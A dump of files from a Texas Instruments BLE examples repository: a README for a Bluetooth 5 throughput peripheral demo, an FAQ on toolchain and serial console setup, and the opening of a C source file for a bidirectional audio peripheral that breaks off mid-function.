"text": "# BLE5-Stack Throughput Peripheral\n\n## Functional Overview\n\nThis project is meant to be utilized with BLE5-Stack Throughput Central to\ndemonstrate Bluetooth™ 5 features.\n\nThis project is based on the Simple Peripheral sample application from the\nBLE5-Stack component of the SDK. Once in a connection, the user may adjust\nconnection settings.\n\nBLE5-Stack Throughput Central Project should be used in order to do a full\nthroughput demo. However, this project can function standalone to demonstrate\nthe Data Length Extension, 2 Megabit, or Coded PHYs when connected to a peer\ndevice supporting these features.\n\nThis list contains the changes from the standard Simple Peripheral example:\n- Added Support for a custom profile called Throughput Profile\n- Changed MTU Size of project\n- Modified to send Notifications with a message counter\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n- 1 UART Terminal on PC\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_throughput_peripheral_cc2640r2lp_stack`\n - Next build and load `ble5_throughput_peripheral_cc2640r2lp_app`\n\n1. Connect to the LaunchPad via PuTTY (or other serial console emulator). For\n instructions on connecting via PuTTY, please see our [FAQ page](faq.md).\n\n1. After connecting to PuTTY, you will be presented with the Two Button Menu\n system prompting you for actions. However, actions are disabled until a\n connection is formed. Disabled actions are indicated with a 'x'.\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n < Next Item\n xSet PHY >\n xSet PDU\n xToggle Throughput Demo\n ```\n\n Current Device Status can also be seen below the menu interface:\n\n ```\n Advertising\n This Device's BDADDR : 0x98072DAA4E5E\n Device GAP Role: Peripheral\n ```\n\n1. Once a connection is formed, the previously disabled options are enabled.\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n < Next Item\n +Set PHY >\n +Set PDU\n Toggle Throughput Demo\n Throughput ON\n 0x00124B005220\n PDU Size: 27B\n\n Num Conns: 1\n This Device's BDADDR : 0x98072DAA4E5E\n Device GAP Role: Peripheral\n ```\n\n Note: If the peer initiating the connection supports the Throughput Profile,\n the Throughput transmission will automatically be turned on.\n\n1. To modify connection settings such as which PHY is being used or the size of\n the DLE PDU, use the left button (BTN1) to select an action, and the right\n button (BTN2) to invoke the action.\n\n# Purpose / Scope\n\nThis example page will demonstrate the maximum BLE throughput that can be\nachieved with a Texas Instruments CC2640R2 where the following assumptions\nare made:\n\n- Both sides of the connection are CC2640 devices. Other stacks in\n master devices such as iOS and Android will limit the maximum\n packets per connection interval, thus limiting the throughput. See\n this [blog post](https://punchthrough.com/blog/posts/maximizing-ble-throughput-on-ios-and-android)\n on how to maximize throughput with Android & iOS devices.\n- Ideal RF conditions. Missed events / CRC errors due to RF\n interference will limit the throughput.\n- Both sides of the connections support the Data Length Extension feature\n of the spec.\n- Neither master nor slave device contains processing that will starve\n the controller, thus limiting throughput. That is,\n application-specific processing or other custom constraints may\n further decrease throughput.\n\nThe throughput being measured is actual usable payload GATT throughput.\nAny LL / L2CAP headers are not considered part of the throughput.\nThe GATT architecture used is such that the GATT server is sending GATT\nnotifications to the GATT client.\n\n# Parameters\n\nThe basic idea is to be constantly sending GATT notifications, with as\nlittle overhead as possible, and as little downtime as possible. The\nfollowing parameters must be considered.\n\n### ATT\\_MTU Size\n\nPlease refer to Section \"5.5.2 Maximum Transmission Unit (MTU)\" in the\nCC2640 BLE SW Developer's Guide ([SWRU393](http://www.ti.com/lit/pdf/swru393))\nfor an explanation of the Attribute Protocol Maximum Transmission Unit\n(ATT\\_MTU).\n\nIn order to minimize L2CAP header overhead, the maximum ATT\\_MTU size is being\nused: 251 bytes. This will result in 244 byte notifications being sent. This\nmeans that there is a 7 byte L2CAP overhead for every 244 bytes sent. In order\nto achieve this, both SBP and SBC project must set the following defines in\n``bleUserConfig.h``:\n\n```\n #define MAX_NUM_PDU 6\n #define MAX_PDU_SIZE 251\n```\n\nThis will allocate 6 Tx buffers of 251 bytes. A custom application will\nneed to be profiled to verify that there is enough heap for the desired\nPDU / PDU size combination.\n\nIf there is not, then the MAX\\_NUM\\_PDU define can be decreased, possibly\ncausing a loss of throughput. Since the actual (worst case) memory used is a\nproduct of the MAX\\_NUM\\_PDU & MAX\\_PDU\\_SIZE, the system designer will need to\nbalance these parameters according to available memory and capability of the\npeer device. For example, when interfacing to an iOS8+ device, a\nMAX\\_PDU\\_SIZE=162 and MAX\\_NUM\\_PDU=6 would match the iOS device's ATT\\_MTU of\n158 and up to 6 packets per connection event. These parameters may vary from a\ngiven iOS release or device.\n\nNote that the max PDU size is not selected to be 255 (max supported by host).\nThis has to do with the maximum data payload supported by the data length\nextension feature in the controller. Data length extension's role in the\nthroughput study is covered in depth in the next section.\n\n### LE 2M PHY Support\n\nThis demo supports use of the *Bluetooth®* 5 2M PHY. This effectively\ndoubles the number of symbols and thus bits, send from the PHY during each\nconnection event.\n\n### LE Controller Data Payload / LE Data Length Extension\n\nThe *Bluetooth* 4.2 specification allows the controller to send data packets\ncontaining up to 251 bytes of application data in a single packet. This is a\ndrastic increase when compared to the previous specifications which limited all\ncontroller data payloads to be 27 bytes. This feature is called data length\nextension. Please refer to [LE Data Length Extension](http://software-dl.ti.com/lprf/ble5stack-docs-latest/docs/ble5stack/ble_user_guide/html/ble-stack/data-length-extensions.html)\nin the BLE5-Stack User's Guide for more information.\n\nData length extension (DLE) is supported by CC2650/CC2640R2 devices running\nBLE5-Stack as well as BLE-Stack. This throughput example has been updated to use\nDLE.\n\nWith DLE enabled, the LE controller can spend more time sending application\ndata and less time processing packet overhead, thus increasing throughput.\n\nIn order to optimize the pipe between the two devices, the ATT\\_MTU is limited\nto be 251 bytes (instead of 255). As mentioned above, the largest data payload\nsupported by the controller is 251 bytes. Setting ATT\\_MTU to be 255 would cause\nthe controller to have to fragment and recombine host data packets at the link\nlayer. This will negatively affect throughput. This is because there is overhead\nfor each data packet sent. See the packet overhead section for more details.\n\nNote that not all 4.2 devices will support DLE. Throughput to mobile devices\nmay be limited based on the capabilities of the device's BLE stack.\n\n### Connection Interval\n\nDepending on the amount of post/pre-processing, the controller needs 2-3ms to\nprepare for the next connection event. Therefore, longer connection intervals\nallow for higher throughput as there is less downtime where notifications are\nnot being sent. This example will use a connection interval of 200ms. Note that\nthere is a significant downside to using higher intervals in a real world\nscenario: missed connection events due to RF interference will drastically\ndecrease the throughput.\nTherefore, it is up to the user to decide what throughput / latency tradeoff is\ndesired. Note that there is not much of a throughput increase after ~100ms\nconnection interval:\n\n### Notification Queuing\n\nThe case considered here assumes that the application is able to queue up\nnotifications quickly enough so that there is always a notification\nready to be sent when a slot opens. This is achieved by the application\nRTOS task running in an infinite loop in ``throughput_peripheral.c``:\n\n```\n static void blastData()\n {\n uint16 len = MAX_PDU_SIZE-7;\n attHandleValueNoti_t noti;\n bStatus_t status;\n noti.handle = 0x1E;\n noti.len = len;\n\n while(1)\n {\n //attempt to allocate payload\n noti.pValue = (uint8 *)GATT_bm_alloc( 0, ATT_HANDLE_VALUE_NOTI, GATT_MAX_MTU, &len );\n\n if ( noti.pValue != NULL ) //if allocated\n {\n //place index\n noti.pValue[0] = (msg_counter >> 24) & 0xFF;\n noti.pValue[1] = (msg_counter >> 16) & 0xFF;\n noti.pValue[2] = (msg_counter >> 8) & 0xFF;\n noti.pValue[3] = msg_counter & 0xFF;\n status = GATT_Notification( 0, ¬i, 0 ); //attempt to send\n if ( status != SUCCESS ) //if noti not sent\n {\n GATT_bm_free( (gattMsg_t *)¬i, ATT_HANDLE_VALUE_NOTI );\n }\n else //noti sent, increment counter\n {\n msg_counter++;\n }\n }\n else\n {\n //bleNoResources\n asm(\"NOP\");\n }\n }\n }\n```\n\nDue to other processing needs, a custom application may not be able to replicate\nor sustain this throughput (e.g., having to wait for payload data to arrive over\nserial interface). In addition, the blastData function maximizes enqueuing of\ndata (Notifications in this example), so it is expected to see\nGATT\\_Notification return a non-SUCCESS status, such as blePending when the\nqueue is full. When this status is returned, the BLE5-Stack will gradually clear\nthe Tx queue as channel conditions permit, thus allowing the application to\nenqueue more GATT Notifications once the queue clears. The depth of the Tx queue\nis determined by the MAX\\_NUM\\_PDU define listed above. Note that the LED pins\nare used for debugging. Under maximum throughput conditions, you may expect to\nsee a high number of blePending (non-SUCCESS) status results from calling\nGATT\\_Notification.\n\n### Packet Overhead\n\nThe host and controller data payloads have been optimized to be 251 bytes.\nThis is the maximum value that makes sense for optimizing throughput.\n\nHowever, not all 251 bytes can be used as application data due to overhead at\nthe ATT and L2CAP levels. These headers are required by the Bluetooth spec and\ncannot be changed. A brief description of this is shown below.\n\n#### ATT Notification Header\n\nAll ATT notification packets have a 3 byte header required to identify the\nopcode and handle of the attribute that is sending the notification.\n\nThere is a 3 byte overhead to sending an ATT notification.\n\n#### L2CAP Header\n\nAt the L2CAP layer, similar overhead is required to set the length of the packet\nand the proper channel identifier (CID).\n\nEach of these fields are 16-bits (2 bytes) resulting in 4 bytes of L2CAP\noverhead.\n\nCombining the L2CAP and ATT packet overhead yields:\n\n TOTAL_PACKET_OVERHEAD = 7 bytes\n"
},
{
"alpha_fraction": 0.69197678565979,
"alphanum_fraction": 0.7197246551513672,
"avg_line_length": 45.9595947265625,
"blob_id": "ff864d0940f047a41f10fb423e82248a52d40321",
"content_id": "a6b969f135ed5cfe145d92e94aaf0d0ce025269e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4653,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 99,
"path": "/docs/faq.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "## Frequently Asked Questions\n\n* [What if I installed the SimpleLink CC2640R2 SDK at a non default location (e.g. Not at ``C:\\ti\\simplelink_cc2640r2_sdk_1_40_00_45``)?](#default)\n* [Why am I getting an error when I am trying to run a Python script from the /tools folder?](#python)\n* [How can I setup my toolchain for use with the ble\\_examples repo?](#toolchain)\n* [I am using a LaunchPad device, how can I view display data?](#display)\n---\n\n### <a name=\"default\"></a>What if I installed the SimpleLink CC2640R2 SDK at a non default location (e.g. Not at ``C:\\ti\\simplelink_cc2640r2_sdk_1_40_00_45``)?\n\nAll projects reference files from the BLE stack using environment variables, you\ncan change this in your IDE's project files.\n\n**CCS**\n\nNo changes to the project is necessary. You just need to ensure that Code\nComposer Studio was able to discover the SimpleLink CC2640R2 SDK in the\navailable *RTSC Products* tab. See the [BLE5-Stack User's Guide][BLE5-Stack] or\nthe [BLE Software Developer's Guide][BLE-Stack] for more details.\n\n**IAR**\n\n1. Navigate to the sample project directory within the repo and open the\n `.custom_argvars` file.\n1. Update the value of ``SIMPLELINK_CORE_SDK_INSTALL_DIR`` to point to your\n custom installation directory where you installed the SimpleLink CC2640R2 SDK.\n\n---\n\n### <a name=\"python\"></a>Why am I getting an error when I am trying to run a Python script from the /tools folder?\n\nLikely your Python environment is not installed correctly. Please check the\nfollowing debug steps:\n\n1. All scripts in the tools folder use Python 2.7, ensure that you have this\n version installed to `C:\\Python27`\n1. Python scripts can be invoked using `python <script_name>.py` this requires\n adding Python to your environment variables.\n * Add ``C:\\Python27`` to the `PATH` variable within your Windows environment\n variables, see\n [windows env vars](https://www.java.com/en/download/help/path.xml) for more\n info.\n1. If you can run the script successfully but get a runtime error, you likely\n don't have the necessary python modules installed.\n * Python modules can be found by looking at the `import` statements at the top\n of the `.py` file. You can install Python modules using the Python package\n manager, pip.\n - Install Pip by following\n [these steps](http://stackoverflow.com/questions/4750806/how-do-i-install-pip-on-windows).\n The section \"Python 2 ≤ 2.7.8 and Python 3 ≤ 3.3\" will be most helpful.\n\n---\n\n### <a name=\"toolchain\"></a>How can I setup my toolchain for use with the ble\\_examples repo?\n\n**CCS**\n\nFor BLE5-Stack examples, see the *Developing in CCS* section in the\n[BLE5-Stack User's Guide][BLE5-Stack]\nfor BLE-Stack examples, see the *Developing with CCS* section of the\n[BLE Software Developer's Guide][BLE-Stack].\n\n**IAR**\n\nFor BLE5-Stack examples, see the *Developing in IAR* section in the\n[BLE5-Stack User's Guide][BLE5-Stack]\nfor BLE-Stack examples, see the *Developing with IAR* section of the\n[BLE Software Developer's Guide][BLE-Stack].\n\n---\n\n### <a name=\"display\"></a>I am using a LaunchPad device, how can I view display data?\nLaunchPad projects are already set up to use the tidriver Display. For more\ninformation about the Display driver please see the Display.h driver\ndocumentation in the Simplelink CC2640R2 SDK (`docs/tidrivers/tidriversAPI.html`)\n\nTo setup your PC to receive this data please follow the steps below:\n\n1. Install PuTTY or another serial terminal emulator\n1. Use the Windows Device Manager (Start → Run → `mmc devmgmt.msc`\n → Ok) to determine which COM port you should connect to:\n\n \n * Note the COM port number of the `XDS110 Class Application/User UART` listed.\n1. Configure putty as a serial console with 115200 8N1.\n1. Fill in the Serial Line field with the COM port from above.\n1. When configured correctly, the program should look as below:\n\n\n| Main Screen | Serial Screen |\n|:---------------------------------------------:|:-------------------------------------:|\n|  |  |\n\n**You may need to unplug/replug your LaunchPad and restart PuTTY if you do not see any output.**\n\n---\n\n[BLE5-Stack]: (http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/ble5stack/ble_user_guide/html/ble-stack-5.x-guide/index.html)\n[BLE-Stack]: (http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/blestack/ble_user_guide/html/ble-stack-3.x-guide/index.html)\n"
},
{
"alpha_fraction": 0.6205049157142639,
"alphanum_fraction": 0.6322389245033264,
"avg_line_length": 29.024911880493164,
"blob_id": "01d5ea25e7aa1097274630cbae76b0c669d9bff1",
"content_id": "3b66796f1a093263a598851c45e506c465f4705e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 42185,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 1405,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/src/app/simple_peripheral_bidirectional_audio.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Filename: simple_peripheral_bidirectional_audio.c\n *\n * Description: This is the simple_peripheral example modified to send\n * audio data over BLE.\n *\n *\n * Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/BIOS.h>\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/display/Display.h>\n\n#include \"hci_tl.h\"\n#include \"gatt.h\"\n#include \"linkdb.h\"\n#include \"gapgattserver.h\"\n#include \"gattservapp.h\"\n\n#include \"peripheral.h\"\n#include \"gapbondmgr.h\"\n\n#include \"osal_snv.h\"\n#include \"icall_ble_api.h\"\n\n#include \"util.h\"\n\n#ifdef USE_RCOSC\n#include \"rcosc_calibration.h\"\n#endif //USE_RCOSC\n#include \"board_key.h\"\n\n#include \"board.h\"\n\n#include <profiles/audio_dle/audio_duplex.h>\n#include <profiles/audio_dle/audio_profile_dle.h>\n\n#include \"simple_peripheral_bidirectional_audio.h\"\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// Advertising interval when device is discoverable (units of 625us, 160=100ms)\n#define DEFAULT_ADVERTISING_INTERVAL 160\n\n// Limited discoverable mode advertises for 30.72s, and then stops\n// General discoverable mode advertises indefinitely\n#define DEFAULT_DISCOVERABLE_MODE GAP_ADTYPE_FLAGS_GENERAL\n\n// Minimum connection interval (units of 1.25ms, 8=10ms) if automatic\n// parameter update request is enabled\n#define DEFAULT_DESIRED_MIN_CONN_INTERVAL 8\n\n// Maximum connection interval (units of 1.25ms, 8=10ms) if automatic\n// parameter update request is enabled\n#define DEFAULT_DESIRED_MAX_CONN_INTERVAL 8\n\n// Slave latency to use if automatic parameter update request is enabled\n#define DEFAULT_DESIRED_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms, 1000=10s) if automatic parameter\n// update request is enabled\n#define DEFAULT_DESIRED_CONN_TIMEOUT 1000\n\n// Whether to enable automatic parameter update request when a connection is\n// formed\n#define DEFAULT_ENABLE_UPDATE_REQUEST FALSE\n\n// Connection Pause Peripheral time value (in seconds)\n#define DEFAULT_CONN_PAUSE_PERIPHERAL 2\n\n// Task configuration\n#define SBP_TASK_PRIORITY 1\n\n\n#ifndef SBP_TASK_STACK_SIZE\n#define SBP_TASK_STACK_SIZE 864\n#endif\n\n// Internal Events for RTOS application\n#define SBP_STATE_CHANGE_EVT 0x0001\n#define SBP_CHAR_CHANGE_EVT 0x0002\n#define SBP_PAIRING_STATE_EVT 0x0004\n#define SBP_PASSCODE_NEEDED_EVT 0x0008\n#define SBP_CONN_EVT_END_EVT 0x0010\n#define SBP_KEY_CHANGE_EVT 0x0020\n#define SBP_KEY_CHANGE_EVT 0x0020\n#define SBP_AUDIO_EVT 0x0040\n\n// Internal Events for RTOS application\n#define SBP_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define SBP_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n#define SBP_PERIODIC_EVT Event_Id_00\n\n#define SBP_ALL_EVENTS (SBP_ICALL_EVT | \\\n SBP_QUEUE_EVT | \\\n SBP_PERIODIC_EVT)\n\n#define DLE_MAX_PDU_SIZE 251\n#define DLE_MAX_TX_TIME 2120\n\n#define DEFAULT_PDU_SIZE 27\n#define DEFAULT_TX_TIME 328\n\n// The combined overhead for L2CAP and ATT notification headers\n#define TOTAL_PACKET_OVERHEAD 7\n\n// GATT notifications for throughput example don't require an authenticated link\n#define GATT_NO_AUTHENTICATION 0\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header.\n uint8_t *pData; // event data\n} sbpEvt_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n\ntypedef struct\n{\n // Service and Characteristic discovery variables.\n uint16 audioStartCharValueHandle;\n uint16 audioDataCharValueHandle;\n uint16 audioVolumeCharValueHandle;\n uint8 lastRemoteAddr[B_ADDR_LEN];\n} SimpleBLEPeripheral_HandleInfo_t;\n\n// Application states\nenum\n{\n BLE_STATE_IDLE,\n BLE_STATE_CONNECTING,\n BLE_STATE_CONNECTED,\n BLE_STATE_DISCONNECTING\n};\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n// Connection handle of current connection\nstatic uint16_t connHandle = INVALID_CONNHANDLE;\n\nstatic PIN_Config SBP_configTable[] =\n{\n Board_LED1 | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX,\n Board_LED2 | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX,\n Board_DIO25_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n Board_DIO26_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n Board_DIO27_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n Board_DIO28_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n PIN_TERMINATE\n};\n\nstatic PIN_State sbpPins;\nstatic PIN_Handle hSbpPins;\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n// Clock instances for internal periodic events.\nstatic Clock_Struct periodicClock;\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct sbpTask;\nChar sbpTaskStack[SBP_TASK_STACK_SIZE];\n\n// Profile state and parameters\n//static gaprole_States_t gapProfileState = GAPROLE_INIT;\n\n// GAP - SCAN RSP data (max size = 31 bytes)\nstatic uint8_t scanRspData[] =\n{\n // complete name\n 0x16, // length of this data\n GAP_ADTYPE_LOCAL_NAME_COMPLETE,\n 'S',\n 'i',\n 'm',\n 'p',\n 'l',\n 'e',\n 'B',\n 'L',\n 'E',\n 'A',\n 'u',\n 'd',\n 'i',\n 'o',\n 'T',\n 'x',\n};\n\n// GAP - Advertisement data (max size = 31 bytes, though this is\n// best kept short to conserve power while advertisting)\nstatic uint8_t advertData[] =\n{\n // Flags; this sets the device to use limited discoverable\n // mode (advertises for 30 seconds at a time) instead of general\n // discoverable mode (advertises indefinitely)\n 0x02, // length of this data\n GAP_ADTYPE_FLAGS,\n DEFAULT_DISCOVERABLE_MODE | GAP_ADTYPE_FLAGS_BREDR_NOT_SUPPORTED,\n // service UUID, to notify central devices what services are included\n // in this peripheral\n 0x03, // length of this data\n GAP_ADTYPE_16BIT_MORE, // some of the UUID's, but not all\n LO_UINT16(AUDIO_SERV_UUID),\n HI_UINT16(AUDIO_SERV_UUID)\n};\n\n// GAP GATT Attributes\nstatic uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"Simple BLE AudioTx\";\n\n// Globals used for ATT Response retransmission\nstatic gattMsgEvent_t *pAttRsp = NULL;\nstatic uint8_t rspTxRetry = 0;\n\nstatic uint8 serviceDiscComplete = FALSE;\nstatic uint16 serviceToDiscover = GATT_INVALID_HANDLE;\nstatic uint8 enableCCCDs = TRUE;\n\n// Handle info saved here after connection to skip service discovery.\nstatic SimpleBLEPeripheral_HandleInfo_t remoteHandles;\n\n/* Audio START characteristic */\nstatic uint16 audioStartCharValueHandle = GATT_INVALID_HANDLE;\nstatic uint16 audioStartCCCHandle = GATT_INVALID_HANDLE;\n/* Audio \"Data\" characteristic */\nstatic uint16 audioDataCharValueHandle = GATT_INVALID_HANDLE;\nstatic uint16 audioDataCCCHandle = GATT_INVALID_HANDLE;\n\n// Application state\nstatic uint8_t state = BLE_STATE_IDLE;\n\n// Discovered service start and end handle\nstatic uint16_t svcStartHdl = 0;\nstatic uint16_t svcEndHdl = 0;\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\n\nstatic void SimpleBLEPeripheral_init( void );\nstatic void SimpleBLEPeripheral_taskFxn(UArg a0, UArg a1);\n\nstatic uint8_t SimpleBLEPeripheral_processStackMsg(ICall_Hdr *pMsg);\nstatic uint8_t SimpleBLEPeripheral_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void SimpleBLEPeripheral_processAppMsg(sbpEvt_t *pMsg);\nstatic void SimpleBLEPeripheral_processStateChangeEvt(gaprole_States_t newState);\n\nstatic void SimpleBLEPeripheral_sendAttRsp(void);\nstatic void SimpleBLEPeripheral_freeAttRsp(uint8_t status);\n\nstatic void SimpleBLEPeripheral_stateChangeCB(gaprole_States_t newState);\n\nstatic uint8_t SimpleBLEPeripheral_enqueueMsg(uint8_t event, uint8_t state,\n uint8_t *pData);\nstatic void SimpleBLEPeripheral_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle,\n uint8_t uiInputs, uint8_t uiOutputs);\nvoid SimpleBLEPeripheral_keyChangeHandler(uint8 keys);\nstatic void SimpleBLEPeripheral_handleKeys(uint8_t shift, uint8_t keys);\n\nstatic void SimpleBLEPeripheral_pairStateCB(uint16_t connHandle, uint8_t state,\n uint8_t status);\nstatic void SimpleBLEPeripheral_processPairState(uint8_t state, uint8_t status);\nstatic void SimpleBLEPeripheral_processPasscode(uint8_t uiOutputs);\nstatic void SimpleBLEPeripheral_DiscoverService( uint16 connHandle, uint16 svcUuid );\nstatic void SimpleBLEPeripheral_EnableNotification( uint16 connHandle, uint16 attrHandle );\n\n//static void SimpleBLECentral_SaveHandles( void );\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// GAP Role Callbacks\nstatic gapRolesCBs_t SimpleBLEPeripheral_gapRoleCBs =\n{\n SimpleBLEPeripheral_stateChangeCB // Profile State Change Callbacks\n};\n\n// GAP Bond Manager Callbacks\nstatic gapBondCBs_t simpleBLEPeripheral_BondMgrCBs =\n{\n (pfnPasscodeCB_t) SimpleBLEPeripheral_passcodeCB, // Passcode callback\n SimpleBLEPeripheral_pairStateCB // Pairing state callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_createTask\n *\n * @brief Task creation function for the Simple BLE Peripheral.\n *\n * @param None.\n *\n * @return None.\n */\nvoid SimpleBLEPeripheral_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = sbpTaskStack;\n taskParams.stackSize = SBP_TASK_STACK_SIZE;\n taskParams.priority = SBP_TASK_PRIORITY;\n\n Task_construct(&sbpTask, SimpleBLEPeripheral_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_init\n *\n * @brief Called during initialization and contains application\n * specific initialization (ie. hardware initialization/setup,\n * table initialization, power up notification, etc), and\n * profile initialization/setup.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_init(void)\n{\n // ******************************************************************\n // NO STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n#ifdef USE_RCOSC\n RCOSC_enableCalibration();\n#endif // USE_RCOSC\n\n HCI_LE_WriteSuggestedDefaultDataLenCmd(DLE_MAX_PDU_SIZE , DLE_MAX_TX_TIME);\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n dispHandle = Display_open(Display_Type_ANY, NULL);\n Display_print0(dispHandle, 0, 0, \"\\f\");\n\n Board_initKeys(SimpleBLEPeripheral_keyChangeHandler);\n\n // Setup the GAP\n GAP_SetParamValue(TGAP_CONN_PAUSE_PERIPHERAL, DEFAULT_CONN_PAUSE_PERIPHERAL);\n\n // Setup the GAP Peripheral Role Profile\n {\n // For all hardware platforms, device starts advertising upon initialization\n uint8_t initialAdvertEnable = TRUE;\n\n // By setting this to zero, the device will go into the waiting state after\n // being discoverable for 30.72 second, and will not being advertising again\n // until the enabler is set back to TRUE\n uint16_t advertOffTime = 0;\n\n uint8_t enableUpdateRequest = DEFAULT_ENABLE_UPDATE_REQUEST;\n uint16_t desiredMinInterval = DEFAULT_DESIRED_MIN_CONN_INTERVAL;\n uint16_t desiredMaxInterval = DEFAULT_DESIRED_MAX_CONN_INTERVAL;\n uint16_t desiredSlaveLatency = DEFAULT_DESIRED_SLAVE_LATENCY;\n uint16_t desiredConnTimeout = DEFAULT_DESIRED_CONN_TIMEOUT;\n\n // Set the GAP Role Parameters\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &initialAdvertEnable);\n GAPRole_SetParameter(GAPROLE_ADVERT_OFF_TIME, sizeof(uint16_t),\n &advertOffTime);\n\n GAPRole_SetParameter(GAPROLE_SCAN_RSP_DATA, sizeof(scanRspData),\n scanRspData);\n GAPRole_SetParameter(GAPROLE_ADVERT_DATA, sizeof(advertData), advertData);\n\n GAPRole_SetParameter(GAPROLE_PARAM_UPDATE_ENABLE, sizeof(uint8_t),\n &enableUpdateRequest);\n GAPRole_SetParameter(GAPROLE_MIN_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMinInterval);\n GAPRole_SetParameter(GAPROLE_MAX_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMaxInterval);\n GAPRole_SetParameter(GAPROLE_SLAVE_LATENCY, sizeof(uint16_t),\n &desiredSlaveLatency);\n GAPRole_SetParameter(GAPROLE_TIMEOUT_MULTIPLIER, sizeof(uint16_t),\n 